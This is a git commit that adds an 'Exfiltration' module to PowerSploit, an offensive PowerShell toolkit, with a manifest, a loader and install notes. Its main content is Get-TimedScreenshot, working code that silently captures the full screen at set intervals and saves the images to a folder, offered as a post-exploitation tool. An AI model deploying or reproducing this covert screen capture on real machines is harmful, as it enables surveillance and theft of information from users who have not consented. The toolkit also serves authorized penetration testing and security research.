Added 'Exfiltration' Module
This commit is contained in:
bitform
parent
b53b6a03a5
commit
b3bbe03e93
|
|
@ -0,0 +1,87 @@
|
|||
@{
|
||||
|
||||
# Script module or binary module file associated with this manifest.
|
||||
ModuleToProcess = 'Exfiltration.psm1'
|
||||
|
||||
# Version number of this module.
|
||||
ModuleVersion = '1.0.0.0'
|
||||
|
||||
# ID used to uniquely identify this module
|
||||
GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'
|
||||
|
||||
# Author of this module
|
||||
Author = 'Matthew Graeber'
|
||||
|
||||
# Company or vendor of this module
|
||||
CompanyName = ''
|
||||
|
||||
# Copyright statement for this module
|
||||
Copyright = 'BSD 3-Clause'
|
||||
|
||||
# Description of the functionality provided by this module
|
||||
Description = 'PowerSploit Exfiltration Module'
|
||||
|
||||
# Minimum version of the Windows PowerShell engine required by this module
|
||||
PowerShellVersion = '2.0'
|
||||
|
||||
# Name of the Windows PowerShell host required by this module
|
||||
# PowerShellHostName = ''
|
||||
|
||||
# Minimum version of the Windows PowerShell host required by this module
|
||||
# PowerShellHostVersion = ''
|
||||
|
||||
# Minimum version of the .NET Framework required by this module
|
||||
# DotNetFrameworkVersion = ''
|
||||
|
||||
# Minimum version of the common language runtime (CLR) required by this module
|
||||
# CLRVersion = ''
|
||||
|
||||
# Processor architecture (None, X86, Amd64) required by this module
|
||||
# ProcessorArchitecture = ''
|
||||
|
||||
# Modules that must be imported into the global environment prior to importing this module
|
||||
# RequiredModules = @()
|
||||
|
||||
# Assemblies that must be loaded prior to importing this module
|
||||
# RequiredAssemblies = @()
|
||||
|
||||
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
|
||||
# ScriptsToProcess = ''
|
||||
|
||||
# Type files (.ps1xml) to be loaded when importing this module
|
||||
# TypesToProcess = @()
|
||||
|
||||
# Format files (.ps1xml) to be loaded when importing this module
|
||||
# FormatsToProcess = @()
|
||||
|
||||
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
|
||||
# NestedModules = @()
|
||||
|
||||
# Functions to export from this module
|
||||
FunctionsToExport = '*'
|
||||
|
||||
# Cmdlets to export from this module
|
||||
CmdletsToExport = '*'
|
||||
|
||||
# Variables to export from this module
|
||||
VariablesToExport = ''
|
||||
|
||||
# Aliases to export from this module
|
||||
AliasesToExport = ''
|
||||
|
||||
# List of all modules packaged with this module.
|
||||
ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'})
|
||||
|
||||
# List of all files packaged with this module
|
||||
FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Usage.md'
|
||||
|
||||
# Private data to pass to the module specified in RootModule/ModuleToProcess
|
||||
# PrivateData = ''
|
||||
|
||||
# HelpInfo URI of this module
|
||||
# HelpInfoURI = ''
|
||||
|
||||
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
|
||||
# DefaultCommandPrefix = ''
|
||||
|
||||
}
|
||||
|
|
@ -0,0 +1 @@
|
|||
Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
|
||||
|
|
@ -0,0 +1,99 @@
|
|||
Function Get-TimedScreenshot {
|
||||
<#
|
||||
.SYNOPSIS
|
||||
|
||||
Get-TimedScreenshot
|
||||
|
||||
Author: Chris Campbell (@obscuresec)
|
||||
License: BSD 3-Clause
|
||||
|
||||
.DESCRIPTION
|
||||
|
||||
A function that takes screenshots and saves them to a folder.
|
||||
|
||||
.PARAMETER $Path
|
||||
|
||||
Specifies the folder path.
|
||||
|
||||
.PARAMETER $Interval
|
||||
|
||||
Specifies the interval in seconds between taking screenshots.
|
||||
|
||||
.PARAMETER $EndTime
|
||||
|
||||
Specifies when the script should stop running in the format HH-MM
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00
|
||||
|
||||
.LINK
|
||||
|
||||
http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html
|
||||
https://github.com/obscuresec/random/blob/master/Get-TimedScreenshot
|
||||
|
||||
#>
|
||||
|
||||
[CmdletBinding()] Param(
|
||||
[Parameter(Mandatory=$True)]
|
||||
[ValidateScript({Test-Path -Path $_ })]
|
||||
[string] $Path,
|
||||
|
||||
[Parameter(Mandatory=$True)]
|
||||
[int32] $Interval,
|
||||
|
||||
[Parameter(Mandatory=$True)]
|
||||
[string] $EndTime
|
||||
)
|
||||
|
||||
#Define helper function that generates and saves screenshot
|
||||
Function GenScreenshot {
|
||||
$ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen
|
||||
$ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height
|
||||
$DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)
|
||||
$DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size)
|
||||
$DrawingGraphics.Dispose()
|
||||
$ScreenshotObject.Save($FilePath)
|
||||
$ScreenshotObject.Dispose()
|
||||
}
|
||||
|
||||
Try {
|
||||
|
||||
#load required assembly
|
||||
Add-Type -Assembly System.Windows.Forms
|
||||
|
||||
Do {
|
||||
#get the current time and build the filename from it
|
||||
$Time = (Get-Date)
|
||||
|
||||
[string] $FileName = "$($Time.Month)"
|
||||
$FileName += '-'
|
||||
$FileName += "$($Time.Day)"
|
||||
$FileName += '-'
|
||||
$FileName += "$($Time.Year)"
|
||||
$FileName += '-'
|
||||
$FileName += "$($Time.Hour)"
|
||||
$FileName += '-'
|
||||
$FileName += "$($Time.Minute)"
|
||||
$FileName += '-'
|
||||
$FileName += "$($Time.Second)"
|
||||
$FileName += '.png'
|
||||
|
||||
#use join-path to add path to filename
|
||||
[string] $FilePath = (Join-Path $Path $FileName)
|
||||
|
||||
#run screenshot function
|
||||
GenScreenshot
|
||||
|
||||
Write-Verbose "Saved screenshot to $FilePath. Sleeping for $Interval seconds"
|
||||
|
||||
Start-Sleep -Seconds $Interval
|
||||
}
|
||||
|
||||
#note that this will run once regardless if the specified time as passed
|
||||
While ((Get-Date -Format HH:%m) -lt $EndTime)
|
||||
}
|
||||
|
||||
Catch {Write-Warning "$Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage"}
|
||||
|
||||
}
|
||||
|
|
@ -0,0 +1,12 @@
|
|||
To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
|
||||
|
||||
The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
|
||||
The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
|
||||
|
||||
To use the module, type `Import-Module Exfiltration`
|
||||
|
||||
To see the commands imported, type `Get-Command -Module Exfiltration`
|
||||
|
||||
For help on each individual command, Get-Help is your friend.
|
||||
|
||||
Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
|
||||
Loading…
Reference in New Issue